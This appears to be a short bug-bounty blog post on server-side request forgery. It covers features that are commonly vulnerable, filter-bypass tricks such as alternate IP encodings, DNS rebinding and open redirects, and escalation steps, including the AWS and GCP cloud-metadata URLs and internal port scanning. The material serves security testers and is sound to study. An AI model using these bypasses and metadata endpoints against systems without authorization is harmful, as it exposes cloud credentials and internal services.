SSRF, Bypasses & Escalation Tips

Dekow MohamedDekow Mohamed
2 min read

Understanding Real-World SSRF Vulnerabilities (Assumes Prior Knowledge)

Caveat: This article assumes you're already familiar with Server-Side Request Forgery (SSRF). If not, check out PortSwigger's SSRF Guide first.

Server-Side Request Forgery (SSRF) is a powerful vulnerability — especially when it leads to internal service access or cloud metadata leaks. But real-world SSRF isn’t always obvious. It often hides in features that appear harmless on the surface.

Here’s a quick breakdown of commonly vulnerable features, exploitation tips, and practical advice on navigating defenses.

Common Features Vulnerable to SSRF

Look for any functionality that fetches remote resources — these often expose SSRF:

  • URL import features (e.g., fetch PDF from a URL)
  • File upload mechanisms (especially when the app fetches file metadata)
  • Headless browsers / HTML rendering
  • Server monitoring dashboards
  • File storage integrations (Dropbox, Google Drive, etc.)
  • Path parameters or Host headers used dynamically
  • Webhooks
  • Open redirect + SSRF chains
  • Import/sync functionality

These are not guaranteed SSRF points, but they’re excellent places to start with.

Key Tips: Finding and Bypassing SSRF Filters

SSRF rarely works on the first try. Many apps have some basic protection. Here are some useful guidelines:

  • Server vs. client: Confirm it’s the server making the request — not the browser. Use tools like Burp Collaborator to verify.
  • Input filters exist: Look out for:
    • IP whitelisting/blacklisting (e.g., blocking 127.0.0.1)
    • Hostname filtering
    • Basic WAFs
  • Bypass techniques:
    • Use alternate IP formats (e.g., 2130706433 for 127.0.0.1)
    • DNS rebinding
    • Use open redirects as intermediaries
    • Try localhost, [::1], 0.0.0.0, etc.

Also note: some firewalls block requests to internal IP ranges, but misconfigured filters can often be bypassed with creative input.

Post-SSRF: Escalation & Impact

Finding SSRF is just the beginning. Your goal should always be to escalate:

  • Scan internal ports: Try ports like 22, 8000, 5000, etc.
  • Access cloud metadata:
    • AWS: http://169.254.169.254/latest/meta-data/
    • GCP: http://metadata.google.internal/
  • Find admin panels:
    • Common paths: /admin, /dashboard, /monitor
    • Internal-only UIs often listen on localhost or private IPs
  • Chain SSRF with other vulns:
    • SSRF → RCE on internal apps
    • SSRF → Open Redirect → Internal Access
    • SSRF → Sensitive info leak (e.g., credentials, config files)

All the best, feel free to connect with me on LinkedIn.

0
Subscribe to my newsletter

Read articles from Dekow Mohamed directly inside your inbox. Subscribe to the newsletter, and don't miss out.

bugbounty

Written by

Dekow Mohamed
Dekow Mohamed